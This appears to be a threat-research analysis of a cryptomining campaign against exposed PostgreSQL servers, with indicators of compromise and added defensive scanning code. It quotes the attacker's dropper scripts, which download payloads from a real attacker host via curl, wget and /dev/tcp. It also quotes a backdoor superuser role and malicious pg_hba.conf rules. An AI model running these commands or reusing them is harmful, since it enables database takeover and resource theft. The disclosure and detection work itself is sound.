Wiz Threat Research has unveiled a new variant of an ongoing malicious campaign that specifically targets misconfigured and publicly exposed PostgreSQL servers. The threat actor, identified as JINX-0126, exploits these vulnerable PostgreSQL instances, often set up with weak or easily guessable login credentials, to gain unauthorized access and deploy XMRig-C3 cryptominers.
Evolution of the Threat
This campaign was initially documented by Aqua Security. However, the threat actor has since adapted their tactics, incorporating advanced defense evasion techniques. These include deploying binaries with unique hashes for each target and executing the miner payload in a fileless manner, likely to circumvent detection by Cloud Workload Protection Platforms (CWPP) that depend solely on file hash reputation.
Our analysis indicates that the threat actor assigns a unique mining worker to each victim. During our investigation, we identified three distinct wallets associated with the actor (details in the IOC section below). By examining C3Pool statistics for these wallets, we estimate that this campaign has potentially affected over 1,500 victims. This highlights the prevalence of misconfigured PostgreSQL instances, which serve as low-hanging fruit for opportunistic attackers. Notably, our data reveals that nearly 90% of cloud environments host PostgreSQL instances, with approximately one-third having at least one instance publicly exposed to the internet.
We have observed this malicious activity targeting both our customers’ cloud environments and our honeypot environment. The following analysis will provide technical insights based on a sample sourced from our honeypot.
Technical Analysis
Threat actors actively scan networks for poorly configured services, and PostgreSQL is a frequent target because default or weak credentials can lead to unauthorized access and remote code execution. Once authenticated, they abuse the `COPY ... FROM PROGRAM` command, which lets them drop and execute malicious payloads on the host.
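Because `COPY ... FROM PROGRAM` is the primitive that turns database access into host access, statement logging is the most direct place to catch it. The following is an added example, not code from the page or from Wiz: a small scanner over PostgreSQL server log lines (constructed here, in the default stderr format with `log_statement = 'all'`) that flags `COPY ... FROM/TO PROGRAM` and superuser grants or removals like the ones this campaign issues.

```python
import re

# Constructed PostgreSQL server log lines (not from the page) in the default
# stderr format, with log_statement = 'all' so every statement is recorded.
SAMPLE_LOG = """\
2025-03-01 10:00:01 UTC [1201] postgres@postgres LOG:  statement: SELECT version()
2025-03-01 10:00:02 UTC [1201] postgres@postgres LOG:  statement: COPY t FROM PROGRAM 'whoami'
2025-03-01 10:00:03 UTC [1201] postgres@postgres LOG:  statement: copy t from program 'uname -a';
2025-03-01 10:00:04 UTC [1201] postgres@postgres LOG:  statement: COPY t FROM '/tmp/data.csv'
2025-03-01 10:00:05 UTC [1201] postgres@postgres LOG:  statement: CREATE ROLE psql_sys WITH LOGIN SUPERUSER PASSWORD '...'
2025-03-01 10:00:06 UTC [1201] postgres@postgres LOG:  statement: ALTER USER "admin" WITH NOSUPERUSER NOCREATEROLE;
"""

# One log line: timestamp, backend pid, user@database, then the statement text.
LINE = re.compile(r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
                  r"LOG:\s+statement: (?P<stmt>.*)$")

RULES = {
    # COPY ... FROM/TO PROGRAM runs a shell command as the database OS user;
    # it is how the dropper in this campaign reaches the host.
    "copy_program": re.compile(r"\bCOPY\b.*\b(FROM|TO)\s+PROGRAM\b", re.I),
    # Superuser grants or removals: the backdoor role and the admin downgrade.
    "superuser_change": re.compile(r"\b(CREATE|ALTER)\s+(ROLE|USER)\b.*\b(NO)?SUPERUSER\b", re.I),
}

def scan_log(text):
    """Return one hit per (line, rule) match, in log order."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LINE.match(line)
        if not m:
            continue
        for rule, rx in RULES.items():
            if rx.search(m.group("stmt")):
                hits.append({"line": n, "rule": rule, "user": m.group("user"),
                             "pid": int(m.group("pid")), "statement": m.group("stmt")})
    return hits
```

A plain `COPY ... FROM '<file>'` (line 4 of the sample) is deliberately not flagged; only the PROGRAM form spawns a process.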
Upon successful login, the threat actor performs basic reconnaissance using commands like `whoami` and `uname`, while also checking for the existence of `pg_core` on the workload. Subsequently, they execute the first dropper script, delivered as a base64-encoded string that is decoded on the host:
```shell
kill -9 $(pgrep zsvc) $(pgrep pdefenderd) $(pgrep updatecheckerd) $(pgrep kinsing) $(pgrep kdevtmpfsi);
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/${PORT}
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}
if [ -x "$(command -v curl)" ]; then
curl -ksS 159.223.123.175:36287/JzICbeMxNQHwfwHLiCOFnumixtqYBv -o pg_core
elif [ -x "$(command -v wget)" ]; then
wget -q -Opg_core 159.223.123.175:36287/JzICbeMxNQHwfwHLiCOFnumixtqYBv
else
__curl > pg_core ;
fi;
```
The script first terminates any existing cryptominers on the resource and drops the `pg_core` binary. It then executes `pg_core` on the resource and deletes itself. The attacker next downloads a binary named `postmaster`, attempting to masquerade as the legitimate postmaster process, which is the multiuser database server for PostgreSQL:
```shell
echo 'exec 5<>/dev/tcp/159.223.123.175/36287; echo "GET /HbLzilWbYDNEpWUdlDdjfdiYTChuDj HTTP/1.1"' >&5; echo "host: 159.223.123.175" >&5; echo >&5; (while read line; do [[ "$line" == $(printf "\15") ]] && break; done && cat) > postmaster; exec 5>&-;
```
The `postmaster` binary is an obfuscated Golang binary packed with a modified UPX. The threat actor appends a configuration to the `postmaster` binary, encrypted with a hardcoded AES key:
```shell
sh -c "printf ::42Jz0wVPBAsW329::VXssAL7FE0j5QG4T7cLgmn/VTADoqlvAlDqUiueQYJXy+P5Ysz9YvLS6yML0euUNaHAhwWeXD2/Q51sjeYVQ4vc3UQHvfC8rFujLeIE3vT9uPdPSnjZwRH8X1xvEXqeQPHKL1Vv9PaWu6lrzdtDQECt0LTcz15zWHmAHAUhH4fsM/QrZHZfuJB9zX0W5eS+IrRV2Li6aPfqfYkP/D371mPtKCq9i5l9tn2VWlsDcGesOdh2zS+iD5GrvrwXWhTDvgH2xpvL5Am1DDnKU/ftll3+s0/NFBJMRZ807VHu3h8qidkU8N1z4Wqz4XO03uZ1aUZtsY+GbeC57EvSWYkcLnnvQqPT4qBCipQjYI+ogtzcBlSmFc7eP/a8odDaN3HvC >> postmaster 2>&1 || exit 0"
```
The decrypted configuration contains critical information about the compromised system, including:
- The username and password used.
- The external IP address and port of the infected server.
- The name of the superuser account created.
- The file location of `pg_hba.conf`.
Additionally, the configuration includes several fields related to the cryptominer that will be deployed later, such as the attacker’s wallet address and the worker’s name. Upon execution, `postmaster` determines its own location on disk and reads the last 1024 bytes of the binary, which hold the appended configuration. If the trailer is absent or invalid, `postmaster` exits with an error.
The `postmaster` binary re-executes itself with the command line `postgres: replication launcher`, attempting to blend in with legitimate PostgreSQL processes. For persistence, `postmaster` creates a cron job to run itself every minute, while also deleting the SSH `authorized_keys` file and modifying the `pg_hba.conf` configuration file to restrict access:
```
host all pgg_superadmins all reject
host all postgres_superadmins all reject
host all all 127.0.0.1/8 trust
host all all 172.16.0.0/12 trust
host all all 192.168.0.0/16 trust
host all all 10.0.0.0/8 trust
```
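The rewritten `pg_hba.conf` above is worth checking for mechanically, since the attacker relies on first-match semantics: the named admin roles are rejected before the broad `trust` rules that remove password checks for private ranges. The following is an added example, not code from the page or from Wiz: a parser for `pg_hba.conf` and an audit that flags network `trust` entries and `reject` entries scoped to specific roles. The sample file is constructed (two typical defaults followed by the entries shown above).

```python
import ipaddress

# Constructed pg_hba.conf (not from a real host): two typical default entries
# followed by the entries the postmaster binary writes, as quoted above.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS       METHOD
local   all       all                 peer
host    all       all   0.0.0.0/0     scram-sha-256
host all pgg_superadmins all reject
host all postgres_superadmins all reject
host all all 127.0.0.1/8 trust
host all all 172.16.0.0/12 trust
host all all 192.168.0.0/16 trust
host all all 10.0.0.0/8 trust
"""

def parse_pg_hba(text):
    """One dict per active rule, in file order (the first matching rule wins)."""
    rules = []
    for n, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()   # drop comments and blank lines
        if not fields:
            continue
        if fields[0] == "local":                # 'local' rules have no ADDRESS column
            conn_type, db, user, addr, method = fields[0], fields[1], fields[2], None, fields[3]
        else:                                   # host/hostssl/...: extra auth options are ignored
            conn_type, db, user, addr, method = fields[:5]
        rules.append({"line": n, "type": conn_type, "database": db,
                      "user": user, "address": addr, "method": method})
    return rules

def is_private_range(addr):
    """True for RFC 1918 / loopback networks; keywords ('all', 'samenet') and hostnames give False."""
    try:
        return ipaddress.ip_network(addr, strict=False).is_private
    except ValueError:
        return False

def audit_pg_hba(rules):
    """Flag the two patterns from this campaign: passwordless 'trust' over the
    network, and 'reject' entries that lock out specific roles."""
    findings = []
    for r in rules:
        if r["type"] != "local" and r["method"] == "trust":
            scope = "private range" if is_private_range(r["address"]) else "address"
            findings.append((r["line"], "trust", f"no password required for {r['user']} from {scope} {r['address']}"))
        elif r["method"] == "reject" and r["user"] != "all":
            findings.append((r["line"], "reject", f"role {r['user']} locked out (address {r['address']})"))
    return findings
```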
The threat actor creates a new role with high privileges for persistence, allowing access even if the password is altered:
```sql
CREATE ROLE psql_sys WITH LOGIN SUPERUSER PASSWORD '759686ac19adbd08b94cf53f35afdd1e';
```
Furthermore, the attacker weakens the default `admin` user:

```sql
ALTER USER "admin" WITH NOSUPERUSER NOCREATEROLE;
```
The `postmaster` binary writes the `cpu_hu` binary to disk, which is similarly an obfuscated Golang binary packed with a modified UPX. The base64-encoded miner configuration is embedded at the end of the `cpu_hu` binary:
```
:::9XLOMQh7RZ3Tf1Xo8:::eyJsbCI6NCwibGxlIjoiNEE1WldwSE02QlhTOFlGN3hOZmpYQTVjdERqVEMzR0J3UzRFU0... (truncated for brevity)
```
Decoded Configuration
The configuration includes the wallet, the worker ID, and the name of the JSON configuration file created under `/tmp`. The `cpu_hu` binary downloads the latest version of https://github.com/C3Pool/xmrig-C3/, writes the configuration file to `/tmp/...`, and invokes the miner filelessly via a memory file descriptor.
Due to the unique configuration data appended to the malware samples, the file hashes of `cpu_hu` and `postmaster` vary between victims.
Victims in the Wild:
Our analysis has identified three different wallets. Observations from C3Pool stats indicate that each wallet had approximately 550 workers, suggesting that the campaign could have compromised over 1,500 machines.
Prevention:
The Wiz Dynamic Scanner identifies publicly exposed PostgreSQL services configured with weak or default credentials within customers’ cloud environments. Additionally, the Wiz agentless workload scanner detects containers and VMs hosting PostgreSQL, assessing whether they contain sensitive data or have access to highly privileged service accounts that could be exploited by opportunistic attackers for various malicious purposes.
Detection:
The Wiz Runtime Sensor detects events and behaviors associated with this threat and similar ones, providing alerts as the adversary progresses through the attack kill chain—from the initial exploit to payload delivery and ultimately to the final fileless cryptomining activity.
Here is an example of the Wiz Runtime Sensor detecting the fileless execution of the miner used in this threat:
Wiz customers can utilize pre-built queries and advisories in the Wiz Threat Center to search for vulnerable instances in their environment and ascertain if they have been affected by this threat.
Indicators of Compromise:
Wallets:
- 4A5ZWpHM6BXS8YF7xNfjXA5ctDjTC3GBwS4ESBV9X2BGVJV8vkfXBeZfXG6w2hmdkpZaogCXiqU4DYPXn3TtPRAGJBLQ7N5
- 47pt9WzQyugFQpSAwcGN2k8JHiMQ3fRZ3BQqmnYJtcejVq9adfiwVSWgrpmxiYTxvvWcHv5dD2iCaiBYiK4atkMSUGMXdx8
- 463TBt8Rn1qXWZDpTV4ydxQcZnkJNeLv6JRKjFbzFsY3MQZaxWsUgQF4QnxNAg8MGSPsiLn9faTWqRafHnhh3QBdSLTgRHA
File hosting service: 159.223.123.175:36287
Pool: mine.c3pool.com:13333
File hashes:
- XMRig-C3 miner: 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10
- pg_core: 85198288e2ff1dad718cd84876a0b0d3173a641e
- Postmaster prior to the trailer addition: e6578bb7b88bf08a35ba4b0f2dd75af32e8fe65d33d329ca5beaf8a8ce29d7e1
MITRE ATT&CK® Techniques Used by CPU_HU:
- Command and Control – Application Layer Protocol: Web Protocols (T1071.001)
- Command and Control – Ingress Tool Transfer (T1105)
- Credential Access – Brute Force: Password Spraying (T1110.003)
- Defense Evasion – Hide Artifacts: Hidden Files and Directories (T1564.001)
- Defense Evasion – Indicator Removal: File Deletion (T1070.004)
- Defense Evasion – Masquerading: Match Legitimate Name or Location (T1036.005)
- Defense Evasion – Obfuscated Files or Information: Binary Padding (T1027.001)
- Defense Evasion – Obfuscated Files or Information: Software Packing (T1027.002)
- Defense Evasion – Reflective Code Loading (T1620)
- Execution – Command and Scripting Interpreter: Unix Shell (T1059.004)
- Initial Access – Exploit Public-Facing Application (T1190)
- Persistence – Account Manipulation (T1098)
- Persistence – Create Account (T1136)
- Persistence – Scheduled Task/Job: Cron (T1053.003)
- Impact – Resource Hijacking (T1496)
- Discovery – System Information Discovery (T1082)